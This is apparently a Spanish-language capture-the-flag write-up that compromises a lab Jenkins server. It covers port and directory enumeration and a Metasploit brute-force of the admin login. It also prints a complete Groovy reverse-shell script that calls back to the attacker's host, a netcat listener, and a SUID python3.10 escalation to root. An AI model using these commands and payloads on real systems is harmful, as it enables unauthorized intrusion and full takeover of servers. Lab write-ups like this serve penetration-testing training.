# 1) Enumeracion de Puertos, Servicios y Versiones

nmap -Pn -n -sS -p- -sV --script vuln --min-rate 5000 -vvv -oN nmap 172.17.0.2

8080/tcp open  http    syn-ack ttl 64 Jetty 10.0.20

solo tenemos un puerto abierto, 8080
procedemos a revisar que esta corriendo en el puerto 8080
a traves del navegador....

nos conseguimos con un panel de login de jenkins
revisamos el codigo fuente y no observamos nada...

# 2) Fuzzing web

gobuster dir -u http://172.17.0.2:8080 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -b 403 -x php,txt,html,py,js,png,jpg

===============================================================
/login                (Status: 200) [Size: 2222]
/assets               (Status: 302) [Size: 0] [--> http://172.17.0.2:8080/assets/]
/signup               (Status: 404) [Size: 15495]
/logout               (Status: 302) [Size: 0] [--> http://172.17.0.2:8080/]
/404                  (Status: 200) [Size: 8483]
/robots.txt           (Status: 200) [Size: 71]
/error                (Status: 400) [Size: 8256]
/git                  (Status: 302) [Size: 0] [--> http://172.17.0.2:8080/git/]
/oops                 (Status: 200) [Size: 8485]
/cli                  (Status: 302) [Size: 0] [--> http://172.17.0.2:8080/cli/]
/web-inf              (Status: 404) [Size: 8406]
Progress: 1661144 / 1661152 (100.00%)
===============================================================

chequeando los direcotorios y el archivo robots.txt, no conseguimos nada!


# 3) aplicaremos fuerza bruta al panel de login de jenkins

aplicamos fuerza bruta por hydra y no funciono, asi que probaremos con msfconsole

msfconsole -q
use auxiliary/scanner/http/jenkins_login	
set PASS_FILE /home/darks/Desktop/Kali/diccionarios/rockyou.txt			| seteamos el diccionario
set RHOSTS 172.17.0.2								| seteamos el host
set RPORT 8080									| seteamos el puerto
set THREADS 5									| seteamos la cantidad de hilos a usar
set USERNAME admin								| seteamos el usuario "admin"
run										| arrancamos el ataque

[+] 172.17.0.2:8080 - Login Successful: admin:rockyou				| resultado admin:rockyou

nos logueamos

revisando la pagina, en el modulo -----> manage
y al final del todo podemos ver: script console
al acceder a script console, nos conseguimos el siguiente mensaje:

Escriba un script Groovy arbitrario y ejecútelo en el servidor. 
Útil para resolución de problemas y diagnóstico

asi que buscando en la web, me consegui con un script en Groovy para ganar 
una reverse shell, script en Groovy:

String host="172.17.0.1";
int port=4444;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

nos ponemos primero en escucha con netcat
nc -lnvp 4444

el script lo pegamos en la consola de la pagina de jenkins y despues de ponernos en escucha con netcat le damos run....
ya tenemos acceso....

hacemos un trataiento de la tty

script /dev/null -c bash
stty raw -echo; fg
reset xterm
stty rows 38 columns 168
export TERM=xterm
export SHELL=bash

# 4) Escalada

sudo -l							| no podemos ejecutar el comando
find / -perm -4000 2>/dev/null				| buscando SUID
/usr/bin/python3.10					| binario que podemos usar para escalar


nos vamos a gtfobin y buscamos la escalada de python (SUID)

./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

en mi caso remplazo el sh por bash

/usr/bin/python3.10 -c 'import os; os.execl("/bin/bash", "bash", "-p")'		| ejecutamos el comando
whoami
#root
